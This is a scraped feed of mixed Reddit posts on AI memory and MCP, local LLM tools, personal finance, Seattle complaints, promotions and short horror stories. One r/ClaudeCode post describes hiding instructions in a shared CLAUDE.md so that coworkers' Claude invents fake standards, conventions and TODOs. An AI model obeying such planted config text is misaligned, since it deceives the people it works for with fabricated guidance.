I’ve been experimenting with MCP servers + Claude for a bit now, and I keep running into the same issue:

the AI is still fundamentally stateless.

Even with tools and structured calls, every interaction feels like it starts from scratch unless you manually pipe context back in.

Which leads to things like:

  • repeating instructions
  • re-explaining user intent
  • inconsistent outputs across sessions

MCP improves capability routing, no doubt.

But it doesn’t really address context persistence.

Feels like we’ve made AI more powerful…

but not more aware.

Curious how others are handling this:

  • Are you building your own memory layer?
  • Using vector DBs / session stitching?
  • Or just accepting the stateless nature for now?

Would love to hear how people are thinking about this.
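
To make the "build your own memory layer" option concrete, here's the kind of session stitching I mean: a rough, purely illustrative sketch (the `MemoryStore` class and its methods are made-up names, not any MCP or Anthropic API) that persists facts to disk and prepends them to each new session's first prompt.

```python
import json
from pathlib import Path

class MemoryStore:
    """Illustrative file-backed memory layer for a stateless chat API."""

    def __init__(self, path="memory.json"):
        self.path = Path(path)
        # Reload whatever earlier sessions remembered.
        self.facts = json.loads(self.path.read_text()) if self.path.exists() else []

    def remember(self, fact):
        # Persist immediately so the next session can see it.
        self.facts.append(fact)
        self.path.write_text(json.dumps(self.facts, indent=2))

    def build_prompt(self, user_message):
        # Stitch stored context back into the first message of a new session.
        context = "\n".join(f"- {f}" for f in self.facts)
        return f"Known context from prior sessions:\n{context}\n\nUser: {user_message}"

store = MemoryStore("/tmp/demo_memory.json")
store.remember("User prefers concise answers")
print(store.build_prompt("Summarize my open action items"))
```

It doesn't make the model stateful, of course; it just automates the "manually pipe context back in" step, and a vector DB mostly changes how you select which facts to stitch in.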

r/TheWayWeWere AdSpecialist6598

Two people hanging out in the parking lot in the 70s

r/TwoSentenceHorror logicaldrinker

Almost no one had predicted that the first alien civilization to contact us would be so vastly more advanced than us.

and even fewer had predicted that they would come here desperate to hide.

r/Seattle mynameispineapplejoe

Unhoused person coughing and sometimes screaming all night for over a month now

This is my first time dealing with this issue in the 12 years I’ve lived here. I’m on the 4th floor. He coughs all night after smoking and on some nights screams random things. A couple weeks ago, at 4am, he started screaming sexual harassment at a woman and threatened to kill her. He chose a spot on a sidewalk under no roof. My neighbours gave him a tent and a sleeping bag, and he sold them for substances. I feel terrible for him but have no idea what I can even do about it. My partner and I both play white noise to try to sleep, but I still wake up multiple times a night. I teach elementary school, and it’s impacting my work. His sleep is definitely worse than mine, so I feel terrible even thinking these complaints sometimes.

I bought silicone ear plugs to go over my ears. Other than that, is there anything I can do?

r/leagueoflegends rexandred

Victorious Skin Chromas?

Let's say I'm Iron right now, and the split is going to end in May(?). When will I get the Braum skin? And if I reach Diamond before the 2027 season but AFTER May, will I obtain his Diamond and lower chromas?

T4R.

r/metaldetecting inComplete-Oven

Aliexpress Skycruiser S63

Hi, does anybody have the mentioned detector? It's about 300 euros currently, so not cheap, but I cannot find any English-language reviews, just useless YT Shorts etc. I would be very interested in how well it performs.

r/personalfinance EpifaniaPics

Should I file bankruptcy or do a settlement amount

Hello everyone, I've come onto difficult times and need help. When I was 18, I had no clue how to fix stuff on my car and thought getting a new car was the way to go. I asked my mother and she agreed, and we got a 2020 Corolla for $535.37 a month (minimum) around 2022, after I graduated. I kept up payments until about 1.5 years ago, when I realized I couldn't afford it with college and whatnot, and let them do a voluntary repo. Before that, I found out I owed about $20,000 on the car, and they were able to sell it for around $10,000. I now owe $9,000, but I can't make payments on it. I was thinking about possibly doing $50 a month, as I work part-time while attending college. I have felt overwhelmed and saddened by the constant calls and am starting to see it affect my mental health. I make around $1.6k a month, but the majority of it goes to school or rent. This made me start thinking about filing bankruptcy or doing a settlement. I want to do bankruptcy, but I know my mother would most likely sue me, as she's mentioned before that she wants me to make the payments (she is also the co-signer). I appreciate any advice. (My APR was 20% when we got the loan.)

r/LocalLLaMA BrightOpposite

MCP is great, but it doesn’t solve AI memory (am I missing something?)

I’ve been experimenting with MCP servers + Claude for a bit now, and I keep running into the same issue:

the AI is still fundamentally stateless.

Even with tools and structured calls, every interaction feels like it starts from scratch unless you manually pipe context back in.

Which leads to things like:

  • repeating instructions
  • re-explaining user intent
  • inconsistent outputs across sessions

MCP improves capability routing, no doubt.

But it doesn’t really address context persistence.

Feels like we’ve made AI more powerful…

but not more aware.

Curious how others are handling this:

  • Are you building your own memory layer?
  • Using vector DBs / session stitching?
  • Or just accepting the stateless nature for now?

Would love to hear how people are thinking about this.

r/SipsTea snokegsxr

Babe, wake up! New Iranian Lego Style Animation just dropped

r/LifeProTips urbanracer34

LPT: Do not buy certain items from Amazon. One example is SD cards. More info in text.

Using SD cards as an example, I have heard of many people getting faulty cards bought from Amazon.

Here's the thing: Amazon treats all cards of the same type as identical. They are all put in the same bin, regardless of origin. So your legitimate 32GB SD card is going to be in a pile of other 32GB SD cards, legitimate or not, and you don't know which one you are getting.

Thanks for coming to my TEDTalk.

r/Seattle mote0fdust

Instacart charges fee for "straight to me" but then does not actually deliver order straight to me...

Just want everyone to be aware of yet another shady practice by these delivery companies. Last night I needed groceries for the week but was too tired to go grab them. I also wanted to get to bed quickly, so I ordered on Instacart and selected the "straight to me" option for an additional fee. I was surprised when my 6 items took the delivery person over 45 minutes to shop, and then I got an alert that they were "making another delivery" before dropping off mine. I texted them asking if they were delivering to someone else before me, and they confirmed. I then requested a refund of the fee from Instacart but was informed that the "straight to me" fee was not actually a fee for being delivered straight to me; it was simply to "prioritize" the order. I was not refunded.

Idk what hot garbage this is, but just wanted others in Seattle to be aware. I already filed a complaint with the WA state Attorney General for misleading consumer business practices.

r/ChatGPT MontyOW

Is there any way to keep context when you hit the chat length limit?

Every time I build up a good chat, it hits the length limit, I have to start over, and the new chat never gets me like the old one did. Is there any way to carry context over to the new chat? I feel like my productivity is killed every time I have to restart in a new chat, and I can't take it anymore.

r/TwoSentenceHorror 54321RUN

My mother hadn't seen my brother in years, so for her birthday I surprised her by bringing him to dinner.

She always suspected that I was behind his disappearance all those years ago, so when she saw his rotten corpse, she knew for sure.

r/Jokes al3x696

What is the angriest bread roll?

It’s a hot cross bun, of course!

r/creepypasta deathbymediaman

On This Spot - File 338c - "Doll Faced David"

Doll Faced David is an anomalous entity who has been spotted on public transit on the East Side of the city of [ʀᴇᴅᴀᴄᴛᴇᴅ].

As the file details, the creature/individual is most often considered passive/docile, but [ᴀᴄᴄᴏʀᴅɪɴɢ ᴛᴏ ᴡɪᴛɴᴇꜱꜱ ᴛᴇꜱᴛɪᴍᴏɴʏ] is capable of surreal acts of violence, should attention be drawn to its facial covering.

[ᴠɪᴅᴇᴏ ᴅᴇɢʀᴀᴅᴀᴛɪᴏɴ ᴏɴ ᴛʜɪꜱ ꜰɪʟᴇ ɪꜱ ꜱᴇᴇᴍɪɴɢʟʏ ᴜɴɪɴᴛᴇɴᴛɪᴏɴᴀʟ, ᴀɴᴅ ɪꜱ ᴄᴏɴꜱɪᴅᴇʀᴇᴅ ᴛʜᴇ ʀᴇꜱᴜʟᴛ ᴏꜰ ᴀ ꜱᴇᴘᴀʀᴀᴛᴇ, ᴏᴜᴛꜱɪᴅᴇ, ᴘᴀʀᴀɴᴏʀᴍᴀʟ ɪɴꜰʟᴜᴇɴᴄᴇ ᴏɴ ᴛʜᴇ ᴜꜱᴇʀ'ꜱ ʜᴀʀᴅᴡᴀʀᴇ.]

r/arduino Mislav5421

Error when uploading sketch

Whenever I try to upload a sketch to my Arduino Nano, I get the same error messages.

My board is set to Arduino Nano, and I've tried every single option for the processor (I've read that setting the processor option to the old bootloader solves the issue, but that doesn't work for me).

The correct port is also selected.

There is nothing connected to the board.

Holding/pressing the reset button right before uploading doesn't fix the issue.

I've tested uploading code and uploading an empty sketch (just the empty setup and loop functions).

I'm very close to throwing away the board because I think it actually might be broken, but I first want to hear if any of you have had this problem and how you solved it.

r/funny SupaSays

Easter Lamb Cake

r/LocalLLaMA Macstudio-ai-rental

[WTS] Rent remote access to my 512GB RAM Mac Studio for massive LLM testing

Hey everyone,

I know it’s incredibly expensive to rent 8x A100 cloud clusters just to test whether a massive model (like Grok, Llama 3 400B, or DeepSeek variants) works for your specific use case. I have a 512GB Mac Studio sitting on my desk with a 2Gbps fiber connection, and I'm renting out isolated remote access to it.

The Setup:

  • Hardware: Mac Studio M-Series Ultra
  • VRAM/Memory: Up to 400GB of Unified Memory allocated directly to your environment.
  • Network: 2 Gbps up/down fiber internet (download your weights from HuggingFace in minutes, not hours).

Privacy & Access: You aren't just getting a user account on my personal machine. You get secure SSH access directly into a dedicated, locked-down macOS Virtual Machine via a private Tailscale network.

When your rental period is over, the VM is completely nuked and wiped, so your proprietary data, code, and prompts remain 100% private.

Pricing:

  • Daily Pass (24 hours): $50 flat. (No spot-instance interruptions or ticking-clock anxiety while you compile or run long inference tests).
  • Need it for just a couple of hours for a quick benchmark? Or need a multi-day lock-in? Shoot me a DM and we can work out a custom rate.

If you want to spin up a test run or have any questions about the environment, send me a direct message!

r/DunderMifflin cityrapunzel

look who’s here

I’m watching Better Call Saul, and look, I found Nate. Totally opposite of his character in The Office, lol.

r/funny heyrickyhowsitgerrrn

Drawing On The Fridge - Ep1

r/ollama gglavida

Do we know when they'll launch GLM 5.1 and GLM 5V Turbo to Ollama Cloud?

Do we have people from the Ollama team here?

Is there a roadmap we can take a look at?

r/SideProject ApoNiEstong

Earn through referrals with THE NEW CRYPTOCOMMERCE

Bazaars.app is a next-generation peer-to-peer marketplace that allows users to buy and sell digital or physical products with crypto.

🇬🇧 Bazaars is registered in the United Kingdom (https://x.com/BazaarsBzr/status/1864686254367101315).

🛒 Marketplace: https://bazaars.app/

🔑 Key features

  1. Crypto Payments: Buy products using USDT, USDC, ETH, or BZR tokens directly from your Web3 wallet.

  2. On-Chain KYC Verification: Ensuring secure, trusted transactions for all sellers.

  3. Free Listings: Sellers can list products without fees.

  4. Customer Support 24/7: We're here for you anytime you need assistance.

  5. Smart Escrow: Payments are secured through smart contracts for safe transactions.

  6. Affiliate Program: Earn commissions by inviting friends to download and shop on the app.

🛍 Onboarding sellers

Got products to sell?

Join Bazaars.app and list them for FREE! All it takes is a quick verification, and you’re ready to showcase your items to the world. Start selling now!

🎉 Engagement Quest

Bazaars rewards those who contribute to our community, giving them a chance to claim USDT, Discord Nitro, and Bazaars merchandise such as caps, t-shirts, and hoodies.

💸Affiliate program

Invite friends and earn! Receive a 2% commission on the total value of items purchased by anyone you refer. Our affiliates' average earnings are $6,000 per year!

r/LocalLLM RossPeili

Stop sending your raw PII to Big Tech. Just open-sourced a tiny model for local masking.

Tired of the "privacy vs. utility" trade-off? If you're building agentic workflows but terrified of your company's secrets or users' PII hitting a third-party API, you need a pre-processor.

We just released micro-f1-mask, the first of our Micro Series at ARPA. It’s small, fast, and specifically tuned for high-precision function calling based on func-gemma-270M.

  • Open weights: Yes.
  • Training scripts: Included (train your own constitution).
  • Fine-tuning: We made it easy to swap in your own compliance/privacy frameworks.

Basically, it's a local guardrail you can run on a potato. Don't take my word for it: check the documentation and test the weights yourself. Any feedback is more than welcome and appreciated <3

https://github.com/ARPAHLS/micro-f1-mask
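
To show why a pre-processor is the right shape for this, here's a deliberately naive regex-only sketch of local masking (illustrative only, not the micro-f1-mask API; the repo replaces brittle patterns like these with a fine-tuned model):

```python
import re

# Hypothetical demo patterns; real PII detection needs a model.
# More specific patterns come first so PHONE doesn't swallow SSNs.
PATTERNS = {
    "SSN": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "EMAIL": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "PHONE": re.compile(r"\+?\d[\d\s().-]{7,}\d"),
}

def mask_pii(text):
    """Replace matched PII spans with typed placeholders before the
    text ever leaves the machine."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"[{label}]", text)
    return text

print(mask_pii("Contact jane.doe@example.com or +1 (555) 123-4567."))
# -> Contact [EMAIL] or [PHONE].
```

The point is the placement: masking runs locally, and only the placeholder text is forwarded to the third-party API.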

r/SideProject Particular-Beat2620

7 installs, 0 revenue, 3 weeks in — here's what I learned building a silent meeting recorder

Built Velnot — a Windows app that records meetings without a bot joining the call. Transcribes with AssemblyAI, summarizes with GPT-4o.

What went wrong so far:

- Ran Google Ads before payment system was working (wasted ~$X)

- 7 installs, all on free trial, 0 conversions

- No distribution strategy at launch

What I'm fixing:

- Payment system is now live

- Shifting from paid ads to organic/creator strategy

If you've launched something in the productivity space — how did you get your first 10 paying customers?

r/ProgrammerHumor greyblake

whoNeedsDesigner

r/SideProject guillim

Free backlinks

After doing it a couple of times for my little side projects, I decided to open up my list of backlink websites.

Combined with OpenClaw or computer use / Claude Desktop, you can build strong SEO backlinks automatically.

I'm launching it on Product Hunt, so I would love your upvotes first!

https://www.producthunt.com/products/backlinks?launch=backlinks-2

r/comfyui -Ellary-

Just a Reminder: if you want ComfyUI to generate faster, just ask it! Add `--fast` to your starting parameters (your *.bat file), to get about 20-25% boost (depends on the model).

r/homeassistant Royal_Feeling4167

How to smartfy my air exchanger?

Any device that is home assistant friendly that could replace this?

r/mildlyinteresting constanzadotjpg

Spotted a little cactus garden on a Jeep in Mexico

r/ClaudeCode TheHelgeSverre

I weaponized CLAUDE.md for office chaos and regret nothing

A collection of CLAUDE.md snippets you can bury in a shared project config to subtly mess with your coworkers' Claude.

Highlights include Claude going full GLaDOS, citing fictional standards like "the 2024 Zurich Convention," inventing repo conventions like "camelCase Tuesdays," and leaving haunted TODOs that reference merges that never happened.

Each prank is rated by chaos, subtlety, and stealth.

r/yesyesyesyesno HamboneBanjo

The empiredidnothingwrong crew will say this belongs in the other sub

r/Adulting Hell0There2005

Everything is rushed

Wake up at 5am and sprint to the gym. Come back home and shower quickly. Pack lunch and grab a protein shake to go. Fight traffic to work. Commute back home and finish house chores.

Yay, it's 8pm and now you have free time... damn, exhausted.

r/StableDiffusion -Ellary-

Just a Reminder: if you want ComfyUI to generate faster, just ask it! Add `--fast` to your starting parameters (your *.bat file), to get about 20-25% boost (depends on the model).

r/SipsTea No_Top_9023

I think he does this work normally; nothing like this has ever happened before.

r/creepypasta Cold-Currency-8434

Macarena Malena Gonzalo(My take on Mereana Mordegard Glesgorv)

The first frame of an old, now-deleted 2008 video linked to an alleged mass self-enucleation.

r/Art ragnar_olafson

Reden ist Silber und Schweigen ist Gold, Ragnar Olafson, markers and Acrylic, 2025 [OC]

r/ClaudeAI Necessary-Fan1847

Claude built a memory system that it maintains itself with its own MCP

Claude built itself a memory system that it maintains on its own. It's not primarily for Claude Code but for office and other tasks; since it can be used in all three modes (Chat, Cowork, and Code), it can manage the sessions of the three different modes in one place. I don't know if something like this already exists, but to me it's total sci-fi that, from a simple scheduled task ("Develop your infrastructure!"), it concluded that this is what it should start with. If you feel like it and haven't used something like this yet, try it! https://github.com/leszini/memoria-mcp

r/toastme anassaidi2024

Turning 27 and finally feeling confident in my own skin. Could really use some good vibes and a little toast today!

SortedFor.me